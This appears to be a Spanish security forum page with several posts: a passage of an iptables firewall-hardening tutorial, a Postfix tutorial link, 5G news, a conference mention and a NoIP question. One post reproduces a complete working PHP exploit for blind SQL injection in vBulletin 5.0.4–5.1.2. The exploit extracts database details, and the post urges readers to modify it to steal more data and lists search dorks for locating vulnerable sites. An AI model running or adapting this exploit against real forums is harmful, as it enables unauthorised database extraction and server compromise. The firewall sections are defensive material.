Un paquete SYN es un envío o una petición TCP de conexión y sólo tiene establecida el FLAG (del ingles bandera) SYN. Si se descartaran todas las peticiones SYN, no se podría establecer ninguna conexión (éste envío sólo tiene establecidos el FLAG SYN y NINGUNO MÁS).


Citar

2. (A) &lt;--[SYN / ACK]&lt;--(B)


Es en este paso donde el host B, si está escuchando comunicaciones en el mismo puerto o canal por el cual transmite el host A, éste en responde a su petición o "saludo", se contestará con un SYN/ACK, dando a entender que acepta su petición, (éste envío sólo tiene establecidos los FLAGS SYN y ACK y NINGÚN OTRO). Si por el contrario, el HOST B, no atiende a conexiones entrantes, responde con un paquete RST se entiende que el puerto está cerrado. Por último, si el host A no recibe ninguna respuesta o recibe un paquete ICMP Port Unreachable (puerto no disponible), el host A interpreta que está filtrado.


Citar

3. (A) -- &gt; [ACK] -- &gt; (B)


Cuando se recibe la confirmación, el primer HOST responde con un ACK y la conexión se da por establecida y es desde entonces que cualquier otro envío TCP que pertenezca a esa conexión tendrá establecida ese FLAG.


Para este tipo de conversación, el escaneo más útil es el "Full Scan" que consta de un análisis puerto a puerto enviando una petición de conexión tal y como se comentaba anteriormente, pero es costosa en tiempo y no demasiado eficiente. El escaneo más rápido es el "Half Open" que imita al anterior, con la diferencia de que en cuanto se recibe la confirmación de disponibilidad (paso 2), se entiende que el puerto está abierto y no pierde más tiempo enviando la respuesta ACK del paso 3. Así pues, éste último es uno de los mecanismos básicos para conocer los puertos de un host y es en él en el que se ha de centrar un administrador de sistemas y prevenir sus efectos.


Tal y como se comentaba anteriormente, el netfilter/iptables proporciona numerosas técnicas utilizando scripts y programas, y es con ellos donde el administrador o encargado del firewall se convierte en un programador para construir paso a paso un firewall robusto y seguro.


DEFINICIÓN DE REGLAS


Iptables permite al administrador definir reglas acerca de qué hacer con los paquetes. Las reglas se agrupan en cadenas: cada cadena es una lista ordenada de reglas. A su vez, las cadenas se agrupan en tablas y cada tabla está asociada con un tipo diferente de procesamiento de paquetes.


Iptables proporciona por defecto tres cadenas básicas (INPUT, OUTPUT y FORWARD: ENTRADA, SALIDA y REENVÍO) y el administrador puede crear tantas como desee. A su vez, también proporciona tres tablas con ciertas cadenas predefinidas las cuales en orden de relevancia y prioridad son:


- Mangle: altera paquetes especiales.

- Nat: iptables actúa como router.

- Filter: iptables actúa como cortafuegos.


La tabla mangle, es la responsable de ajustar las opciones de los paquetes, como por ejemplo, la calidad de servicio (QoS/TOS). Todos los paquetes pasan por esta tabla debido a que está diseñada para efectos avanzados.


La tabla nat table, es la responsable de configurar las reglas de reescritura de direcciones o de puertos de los paquetes. El primer paquete en cualquier conexión pasa a través de esta tabla; los veredictos determinan cómo van a reescribirse todos los paquetes de esa conexión.


La tabla filter, es la responsable del filtrado (es decir, de rechazar, bloquear o permitir que un paquete continúe su camino). Todos los paquetes pasan a través de la tabla de filtros.


Una vez que el administrador entiende la estructura del iptables, ya puede empezar a diseñar la su estructura.


Cómo todo script, en linux, se ha de empezar definiendo la cabecera y las posibles variables que se vayan a utilizar:



Citar

#!/bin/sh # indica el shell de ejecución.

IPTABLES=/usr/sbin/iptables # especifica la ruta del iptables (el programa).

EXTIF=eth0 # indica el interfaz de entrada al firewall.

INTIF=eth1 # indica el interfaz de salida del firewall.


Éstas no son todas las variables que se pueden utilizar, pero si son las básicas, más adelante y conforme sean necesarias, se pueden ir definiendo más.


POLÍTICAS POR DEFECTO


Antes de empezar a definir las reglas, cadenas y tablas, se ha de especificar una política por defecto que establecerá el principio de actuación ante el tráfico de la red. Dicha política puede ser permisiva (ACCEPT) dejando pasar todo el tráfico siempre y cuando no se indique lo contrario, o cerrado (DROP), el cual por defecto descartará todo el trafico.


En modo por defecto que se utilizará en esta explicación, es DROP, ya que asegura que todo el tráfico que no se permita explícitamente en las reglas y cadenas será descartado.



Citar

###### Política por defecto DROP

$IPTABLES -P INPUT DROP

$IPTABLES -P OUTPUT DROP

$IPTABLES -P FORWARD DROP


REGISTRO EN LOGS DEL TRÁFICO RECHAZADO


El siguiente paso, es definir las variables para los logs de todo el tráfico que se descartará, ya que esto, permite su análisis en tiempo real.



Citar

###### Variable para Log de los REJECT

$IPTABLES -N DROP_IN_LOG # se crea una nueva cadena (a no ser que ya exista) de nombre DROP_IN_LOG

$IPTABLES -F DROP_IN_LOG # se borra el contenido de la cadena por si ya existía.

$IPTABLES -A DROP_IN_LOG -j DROP # se añade una regla que indica a la variable creada que únicamente registre los DROPs


Citar


$IPTABLES -N DROP_FWRD_LOG

$IPTABLES -F DROP_FWRD_LOG

$IPTABLES -A DROP_FWRD_LOG -j DROP



Citar

$IPTABLES -N DROP_OUT_LOG

$IPTABLES -F DROP_OUT_LOG

$IPTABLES -A DROP_OUT_LOG -j DROP


REGISTRO EN LOGS DEL TRÁFICO DESCARTADO


Adicionalmente, se pueden añadir reglas para que en el log del sistema se pueda ver el tráfico descartado:



Citar

$IPTABLES -A DROP_IN_LOG -p ICMP -m limit --limit 10/minute -j LOG --log-prefix "FIREWALL_INPUT_ICMP_DROP "

$IPTABLES -A DROP_IN_LOG -p TCP -m limit --limit 10/minute -j LOG --log-prefix "FIREWALL_INPUT_TCP_DROP "

$IPTABLES -A DROP_IN_LOG -p UDP -m limit --limit 10/minute -j LOG --log-prefix "FIREWALL_INPUT_UDP_DROP "


con el parámetro "-p" se indica que el protocolo sobre el cual va dirigida la regla, puede ser TCP, UDP o ICMP.


Se puede mejorar para el tráfico entrante añadiendo las siguientes reglas:



Citar

$IPTABLES -A DROP_IN_LOG -p tcp -i eth0 -j REJECT --reject-with tcp-reset

$IPTABLES -A DROP_IN_LOG -p udp -i eth0 -j REJECT --reject-with icmp-host-unreachable

$IPTABLES -A DROP_IN_LOG -p icmp -i eth0 -j REJECT --reject-with icmp-host-unreachable


Con estas reglas, lo que se consigue es que ante una petición entrante para una conexión no definida:


a) El paquete TCP se rechace con otro paquete TCP pero con un FLAG RST, evitando que se responda con un SYN/ACK que de cara al scan significaría que hay un sistema detrás respondiendo a la petición.

b) El paquete UDP/ICMP se rechace con una respuesta de DESTINO NO ALCANZABLE.


También en respuesta a la petición de conexión, sobre el protocolo TCP, se podría substituir reject-with tcp-reset por reject-with icmp-host-unreachable.


NOTA: tener en cuenta, que el bloqueo total de los ICMP puede afectar al QoS de la línea.


MODULOS DE KERNEL


El siguiente paso es cargar módulos del kernel que ayudarán y facilitarán en gran medida la protección general del sistema:


1. Para poder hacer forwards de los paquetes entre la red externa (WAN-internet) del firewall y la LAN interna. Sin este módulo, no se podrían utilizar reglas FORWARD ya que cada interfaz sería independiente y la LAN estaría aislada al no disponer de salida al exterior.



Citar

echo 1 &gt; /proc/sys/net/ipv4/ip_forward


2. Éste módulo ofrece una protección frente el Spoofing basada en enmascarar o suplantar la identidad. IP spoofing, consiste en que un atacante gana acceso no autorizado a un equipo o a una red haciendo parecer que un mensaje malicioso viene de una máquina confiable haciendo "spoofing" de la dirección IP de esa máquina



Citar

echo 1 &gt; /proc/sys/net/ipv4/conf/ * /rp_filter


3. El módulo Explicit Congestion Notification (ECN) proporciona un control de congestión en la red que hace que los paquetes se enruten hacia redes menos congestionadas de tráfico y con un mayor ancho de banda en vez de enrutar hacia el camino más corto. En teoría, es recomendable tenerlo activado pero presenta algunos inconvenientes ya que existen todavía dispositivos antiguos tales como routers, firewalls, etc. que tratan los paquetes ECN como si fueran malformados y los descartan, haciendo que la comunicación se rompa y el usuario no sepa por donde falla. Es por eso que se recomienda deshabilitar el módulo si se detectan interrupciones del tráfico.


Citar

echo 0 &gt; /proc/sys/net/ipv4/tcp_ecn


4. El módulo sync cookies proporciona un control sobre los paquetes SYN, ofreciendo protección ante ciertos ataques DoS de bomba SYNC. Sync packet flooding es una ataque de denegación de servicio. En el caso de que un host atacante empezase a mandar de forma masiva paquetes SYNC con la cabecera falseada con una IP de origen falsa el host atacado mandará sus ACK o bien a ningún host o a un host que no es el que está intentando establecer la comunicación. Dependiendo del tamaño de la pila TCP de ese host tratará el paquete ACK de una forma u otra consumiendo el ancho banda disponible hasta llegar a un momento en el que no puedan atender más conexiones, colapsándose y bloqueando las comunicaciones, produciéndose una denegación de servicio.


Una buena ayuda en la prevención de este tipo de ataques, es ampliar el tamaño de las colas en las que se almacena la información referente a las peticiones de conexión: net.ipv4.tcp_max_syn_backlog.


Citar

echo 1 &gt; /proc/sys/net/ipv4/tcp_syncookies


5. Con el módulo icmp_ignore_bogus_error_responses se establece una protección similar a la anterior, pero con paquetes ICMP para evitar ataques del tipo DoS de bomba ICMP.


Citar

echo 1 &gt; /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses


6. Activando el modulo ip_dynaddr se consigue que en las conexiones SLIP, PPP, o DHCP con o sin marcación bajo demanda, el primer paquete no sea rechazado por no tener conexión o línea establecida y resuelva también dns. En caso contrario, en determinadas circunstancias, la primera conexión es rechazada por no haber un enlace establecido porque es esta primera conexión o intento de conexión, la que activa el marcado o el enlace.


La activación de este módulo no es necesaria si se dispone de ip fija o los interfaces no son SLIP, PPP o DHCP.


Citar

echo 1 &gt; /proc/sys/net/ipv4/ip_dynaddr


7. Con el módulo accept_source_route, se decide si se aceptan paquetes cuyas ruta haya sido prefijada en el origen (source routed packets) o no. Éste módulo proporciona una seguridad ante escaneos y/o ataques con rutas pre-establecidas.


Es importante remarcar, que en redes multilínea donde la entrada de datos y de salida son diferentes, o con rutas prefijadas en proxies, balanceos de carga o routers, la deshabilitación de éste módulo, conlleva un corte en la transmisión, ya que se descartarán dichos paquetes con una ruta ya establecida.


Citar

echo 0 &gt; /proc/sys/net/ipv4/conf/ * /accept_source_route


8. Deshabilitando la aceptación de paquetes ICMP del tipo Redirect Acceptance con el módulo accept_redirects, se consigue evitar que el enrutado de paquetes cambie del prefijado, ya que en una conexión normal, los paquetes se envían a un gateway prefijado y consecuentemente a un router, sin embargo, si se recoge un paquete ICMP informando que el enrutado se hace desde otra ip, puede ser señal de un ataque Man in the middle.


No obstante, en redes multiruta la desactivación de este módulo puede conllevar problemas. Jamás deberá estar habilitado en un router bien configurado.


Citar

echo 0 &gt; /proc/sys/net/ipv4/conf/ * /accept_redirects


9. En una red, cuando se envían paquetes ICMP del tipo Redirect Acceptance, significa que existen varios routers y por tanto se ha de notificar. No obstante, si el equipo que envía ese paquete no es un router, significa que hay una intromisión en la red y que se están enrutando las conexiones por donde no deberían.


Nunca es necesario para máquinas que no están destinadas a realizar tareas de enrutamiento.


Citar

echo 0 &gt; /proc/sys/net/ipv4/conf/ * /send_redirects


10. La habilitación de éste módulo, conlleva la aceptación de las redirecciones ICMP que vengan de un router fijo. Sólo deberá ser habilitado en caso de redes con múltiples routers. Si la red es razonablemente estable y estática, es preferible deshabilitarlo.


Citar

echo 0 &gt; /proc/sys/net/ipv4/conf/ * /secure_redirects


11. Con éste módulo, se consigue ignorar los broadcasts, cosa que proporcionará una protección adicional ante ataques ARP y ARP SPOOFING, en todo caso, la dirección mac que se obtendría sería la del ROUTER en caso de un ataque desde el exterior. En caso de que el equipo se encargue de enrutar, hay que tener en cuenta otros tipos de protección adicional.


Citar

echo 1 &gt; /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts


Con todos estos módulos, se ha incrementado el nivel de seguridad del sistema, añadiendo protección ante SPOOFING, algunos tipos de DOS, paquetes con la ruta modificada y peticiones de rutas (MAN IN THE MIDDLE) y broadcasts.


Una vez configurado todo lo anterior y con una política por defecto y sus reglas se tiende a pensar que ya se esté suficientemente protegido. Como existen diferentes tipos de scaneos de puertos y aunque el más normal sea el de PING o el SYN Connect, hay scaneos con paquetes falsos o mal formados que se envían con la esperanza de evitar las reglas y que muchas veces se responden dando al atacante un SÍ a su paquete mal-formado.


Una vez cargados los módulos en el núcleo del sistema, corresponde al siguiente paso el proceso de filtrar explícitamente todo lo que no se desea. Nótese que algunas reglas pueden ser o parecer recurrentes, pero no está demás tener presente dichas reglas y su contenido.


FILTRADO ICMP


El primer paso es bloquear el primer y más viejo sistema de averiguar si hay o no hay algo o alguien en una IP, es por eso que se bloquearán los pings (tráfico ICMP) del interfaz de entrada y consecuentemente las respuestas.



Citar

iptables -A INPUT -i $EXTIF -p icmp --icmp-type echo-reply -j REJECT --reject-with icmp-host-unreachable

iptables -A OUTPUT -o $EXTIF -p icmp --icmp-type echo-request -j REJECT --reject-with icmp-host-unreachable


Estas reglas junto con los módulos previamente cargados, evitarán mensajes ICMP no deseados y que en ocasiones pueden llegar a ser perjudiciales para el QoS de la red.



Citar

$IPTABLES -N ICMP_NON

$IPTABLES -F ICMP_NON

$IPTABLES -A ICMP_NON -p icmp --icmp-type redirect -j DROP

$IPTABLES -A ICMP_NON -p icmp --icmp-type router-advertisement -j DROP

$IPTABLES -A ICMP_NON -p icmp --icmp-type router-solicitation -j DROP

$IPTABLES -A ICMP_NON -p icmp --icmp-type address-mask-request -j DROP

$IPTABLES -A ICMP_NON -p icmp --icmp-type address-mask-reply -j DROP


PROTECCIÓN CONTRA FLOOD


El segundo tipo de escaneo que se va a proceder a bloquear, aunque es un método ya desfasado, todavía se utiliza, sobre todo en ataques DoS. Se trata del flood y antes de aplicar las reglas se ha de tener presente el límite que se va a imponer, en este caso 30 conexiones por segundo y con un máximo de 60 simultáneas. Nota a tener en cuenta, es necesario consultar con el administrador de red y sistemas para establecer un límite de conexiones suficientemente bajo para evitar el flood, pero suficientemente alto para prestar servicio a las conexiones entrantes.



Citar

$IPTABLES -N flood

$IPTABLES -F flood

$IPTABLES -A flood -m limit --limit 30/second --limit-burst 60 -j RETURN

$IPTABLES -A flood -m limit --limit 30/second --limit-burst 60 -j LOG --log-prefix "flood: "

$IPTABLES -A flood -j DROP


FILTRADO DE PAQUETES MANIPULADOS


Tal y cómo se comentaba anteriormente, en ciertos tipos de escaneos, se pueden falsear los flags tcp y así traspasar el firewall, pero también se puede falsear el estado, para evitar eso se descartaran todos los paquetes que tengan estados inválidos.



Citar

### se descartan paquetes mal formados e inválidos

$IPTABLES -N PKT_FAKE

$IPTABLES -F PKT_FAKE

$IPTABLES -A PKT_FAKE -m state --state INVALID -j DROP

$IPTABLES -A PKT_FAKE -p tcp ! --syn -m state --state NEW -j DROP

$IPTABLES -A PKT_FAKE -f -j DROP


Con este descarte, se consigue descartar todos los paquetes que sean inválidos (-m state --state INVALID), todas las conexiones nuevas que no sean SYN (-p tcp ! --syn -m state --state NEW)* y los paquetes fragmentados (-f).


*Esta es una característica que no está demasiado documentada en iptables y que tiene que ver con paquetes que están marcados como nuevas conexiones pero que no tienen establecido el flag SYN, esto se debe a que en determinadas ocasiones se necesita considerar que un paquete puede ser parte de una conexión ya establecida (ESTABLISHED) en, por ejemplo, otro firewall. Es por eso que en una red con dos o más firewalls, puede darse la posibilidad de cuelgue o caída de uno de ellos, entonces el segundo acogería y absorbería todo el trafico, sin embargo, este hecho permitiría que casi cualquier conexión TCP con el estado NEW atravesase el firewall.


Recordando cómo se establecía una conexión, el siguiente paso en la construcción del firewall es el bloqueo de paquetes inválidos, así pues se procede a descartar los paquetes tcp con FLAGS no permitidos y para entender un poco más el tema en cuestión, es necesario entender el paso contrario y que pasa cuando se quiere finalizar una conexión:


1. (A) --&gt; ACK/FIN --&gt; (B)

El primer host dice que quiere FINalizar la conexión. Es necesario recordar que hasta que no se acabe, todos los paquetes tcp lleva levantados el FLAG ACK.


2. (A) &lt;-- ACK &lt;-- (B)

Se le responde con un ACK dando a entender que le ha llegado su petición de finalizar.


3. (A) &lt;-- ACK/FIN &lt;-- (B)

Y se le envía un FINalizar.


4. (A) --&gt; ACK --&gt; (B)


Y consecuentemente, éste le envía su ACK y se da por finalizada la conexión.


Ésta no es la única forma para finalizar una conexión, en ciertas ocasiones (timeout, port or host unreachable, etc.), es necesario terminar de forma rápida, es por eso que se envía un paquete RST (reset). No obstante, téngase en cuenta que un RST no siempre o no necesariamente, forma parte de una conexión TCP establecida. Generalmente, suele ir acompañado de un ACK.


Así pues, toca añadir reglas que descartan esos paquetes TCP que no son correctos.



Citar

$IPTABLES -N FLAG_SCAN

$IPTABLES -F FLAG_SCAN



Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP


por extensión, sucede lo mismo con los paquetes RST.


Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags SYN,RST SYN,RST -j DROP


no obstante, tampoco es una combinación legal el enviar un paquete TCP solamente con el flag FIN.



Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags ALL FIN -j DROP


por extensión estas otras combinaciones, también son ilegales, ya que FIN/RST y SYN son incompatibles y menos cuando van acompañadas de URGente y PSH de datos.



Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags SYN,FIN,PSH SYN,FIN,PSH -j DROP

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags SYN,FIN,RST SYN,FIN,RST -j DROP

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags SYN,FIN,RST,PSH SYN,FIN,RST,PSH -j DROP

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP


esta última también se podría interpretar como que esta marcada para hacer un reset (RST), pero a diferencia de FINalizar, a los reset no se les devuelven un ACK. De todas maneras, es incompatible un FLAG RST con un FIN y en ningún caso con un SYN.


Otro tipo de escaneo es el conocido por NULL SCAN o NULL Flag, Se basa en enviar paquetes TCP sin ningún FLAG, esta técnica establece que el equipo remoto ha de responder con un paquete RST, ACK si el puerto esta cerrado y nada si esta abierto.



Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags ALL NONE -j DROP


En contraposición, el escaneo mediante la activación de todos los FLAGS se le conoce como XMAS. Los ataques con esta técnica en equipos Windows nunca han respondido, si bien antiguamente era bastante eficaz con pilas TCP/IP del primitivo BSD, es decir, Linux, Solaris y las distribuciones basadas en BSD. No obstante en la actualidad ya no responden a estos abusos del protocolo, salvo equipos antiguos.



Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags ALL ALL -j DROP


Variante NMAP-XMAS


Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP


Variante XMAS-PSH.


Citar

$IPTABLES -A FLAG_SCAN -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP


En todos estos casos, se puede sustituir el destino DROP por el REJECT --reject-with icmp-host-unreachable, falseando una respuesta.


Una vez implementadas estas reglas, sólo queda aplicarlas al firewall y se obtendrá una protección aún mayor y bastante más efectiva ante los escanos de puertos.


CONCLUSIONES


Como conclusión al leer este artículo, se podría decir que la construcción restrictiva mediante DROP, la carga de módulos en el kernel y el bloqueo de paquetes TCP, es bastante segura y activa, pudiendo controlar los paquetes de entrada y la respuesta.


No obstante, siempre cabe la posibilidad de errores humanos o una incorrecta implementación en el sistema o terceros errores que pueden dar pie a un fallo de seguridad. Por todo ello, nunca se ha de establecer un sólo punto de control y barrera, sino que es recomendable disponer de varios firewalls en paralelo (tolerancia a fallos y redundancia) y en serie en cada red o subred. También es recomendable disponer un sistema de IDS o NIDS para aumentar el control y vigilancia de la red.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#76

¿Qué tal? Hoy les voy a compartir un tutorial que tenía por ahí de cuando instale por primera vez Postfix. El tutorial esta detallado y con imágenes así que se los recomiendo.

En este tutorial se pretende instalar y configurador Postfix que es un Servidor de Email para Linux, además de configurar un cliente para testearlo.

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Formato: PDF
Tamaño: 3,77 MB
Páginas: 47
Autor: Juan Carlos Tirado Sánchez
Uploaded: Stiuvert
#77

Puede sonar a locura total, pero la carrera hacia el 5G ya ha comenzado, al menos en los laboratorios de las grandes empresas interesadas en desarrollar las redes móviles del futuro. Unas redes que no estarán disponibles hasta 2020, pero que llevan ya un año dando que hablar.

El último hito lo ha marcado Ericsson, que ha conseguido alcanzar velocidades de 5 Gbps reales de bajada en una prueba pre-estándar en Suecia. Esto significa aumentar 70 veces la velocidad que alcanzan en España las actuales redes 4G (75 Mbps aproximadamente), unas conexiones que el año que viene doblarán su capacidad, tal y como ya te contamos.


Llegar a este nuevo récord de transmisión inalámbrica supone poder descargarse un megarchivo de 50 GB en unos 80 segundos. Esto es solamente un ejemplo gráfico, ya que con ese archivo casi petaríamos la memoria de un terminal actual.


La compañía sueca afirma que el objetivo es que ésta no se quede en una simple prueba comercial, sino que espera que algún día llegue a la vida real.


Esto es un hito considerando que las anteriores pruebas, llevadas a cabo por fabricantes asiáticos, habían conseguido llegar a 1 Gbps, pero también se queda a la mitad del camino ya se espera que la velocidad móvil pueda llegar hasta los 10 Gbps dentro de poco más de un lustro (5 años). Cien veces más que el dispositivo móvil más rápido actual, ahí es nada




Pero no es oro todo lo que brilla

También cabe aclarar que la denominación 5G puede resultar un poco engañosa, ya que cada empresa va por su lado y realiza sus pruebas con distintos estándares (y ninguno definido).


Por ejemplo, Samsung, uno de los gigantes en la carrera, utilizó un tipo de tecnología cuyo alcance llega solamente a 2 kilómetros desde la central. Una nimiedad considerando que en 2015 las antenas de 4G españolas tendrán un alcance de unos 50 km y una mejor penetración en interiores que actualmente.


Otros de los comprometidos desde hace años con el futuro 5G es el fabricante chino Huawei, que va a invertir más de 500 millones de euros en los próximos años.


Tampoco hay que olvidarse del apoyo gubernamental chino, pero también el de la Unión Europea. Por tanto, el hito marcado por Ericsson podría enmarcarse en una carrera de fondo por llegar a la fórmula perfecta, que incluya un buen funcionamiento dentro de edificios y con un buen radio de alcance, una mezcla de tecnologías que aún queda tiempo para conseguirse.



Un mundo cada vez más automatizado

Aventurar en qué nivel tecnológico estaremos en 2020 es bastante complejo, pero el 5G llegará a un mundo en el que el 'Internet de las cosas' estará más implantado en nuestras vidas.

Las nuevas redes serán útiles en automóviles (sean automáticos como el prototipo de Google o no), en electrodomésticos inteligentes y en otras "cosas" conectadas a la Red. La demanda de datos móviles seguirá creciendo inexorablemente, y no solo por los dispositivos actuales o la tecnología de vestir.

Aumentará también el consumo en aplicaciones 'machine to machine', es decir, para la comunicación entre dos máquinas mediante conexión de datos remota (inalámbrica en este caso, pero puede ser por cable).

En este último punto entrarían en juego las futuras 'smart cities', donde se automatizarán muchas de las labores cotidianas de mantenimiento (recogida de residuos, gestión del tráfico, agua, alumbrado...) y la velocidad 5G para comunicar distintas máquinas podría ser muy útil.

El 5G también tendría cabida en las operaciones médicas a distancia, ya que la velocidad supersónica que alcanzará no permitirá ni un mínimo retardo en una videoconferencia.


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#78
Charla de Chema Alonso con mucho humor sobre Seguridad informática, metadatos entre otros celabrado en Zaragoza (España).





El pasado mes de Junio, en la bella ciudad de Zaragoza, estuve como ponente invitado en el X Fórum AUSAPE 2014 para dar una charla. La conferencia se grabó y hace unos días la habían publicado. Yo la he recuperado y la he puesto aquí. Esta conferencia se basa en el Decálogo de Seguridad Maligno que ya había publicado hace unos años por aquí.




Imágenes sobre la conferencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#79
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hace unos días se supo de una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero como siempre primero me gusta verificar y recién hoy se ha publicado en PacketStorm una versión pública ya que en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ya se encontraba pero para acceder a él hay que pagar...



vBulletin es un software
desarrollado por vBulletin Solutions, para la creación y mantenimiento de foros
en Internet. Está basado en PHP y MySQL y según la propia compañía más de
100.000 sitios funcionan bajo este sistema.


Según confirma vBulletin, el
problema afecta a las versiones 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2. El grupo
Romanian Security Team (RST) ha publicado un vídeo en el que se muestra la
vulnerabilidad y confirma el reporte a vBulletin, que ofrecerán todos los
detalles tras la publicación del parche.



La vulnerabilidad permite a un usuario malicioso realizar ataques de inyección
SQL
sobre la base de datos, con todas las implicaciones que ello puedo
llevar. Es decir, extraer toda la
información y contenido de la base de datos
, e incluso a partir de ahí
comprometer todo el sistema.



El exploit que se ha publicado nos permite obtener la versión, nombre y usuario de la base de datos, para obtener datos más jugosos debéis modificar el exploit:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Código: php

<?php

/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
    $ch = curl_init($url);


    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
     
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
     ));


    $output = curl_exec($ch);
     
    if($output == FALSE) print htmlspecialchars(curl_error($ch));


    curl_close($ch);
    return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
    $string = " ".$string;
    $ini = strpos($string,$start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string,$end,$ini) - $ini;
    return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
     
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
        'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
        '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];


    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
            'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
            '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Google ya ha bloqueado una posible busqueda del dork necesario para buscar sitios afectados, por ejemplo:

"Powered by vBulletin® Version 5.1.2"
"Powered by vBulletin® Version 5.0.4"
"Powered by vBulletin® Version 5.0.5"
"Powered by vBulletin® Version 5.1.0"
"Powered by vBulletin® Version 5.1.1"

Pero si buscan con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta encontrarán resultados.

Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Fuente Original: Blackploit
#80
Buenos días,

Estoy buscando un método para actualizar una cuenta NoIP remotamente, sé que entrando desde la web se puede actualizar la IP de forma manual pero como consigo saber la IP pública de un router el cual tengo acceso físico?

Este router no dispone de PC por lo tanto no se puede acceder de esa forma.


Saludos





Enviado desde mi Smartphone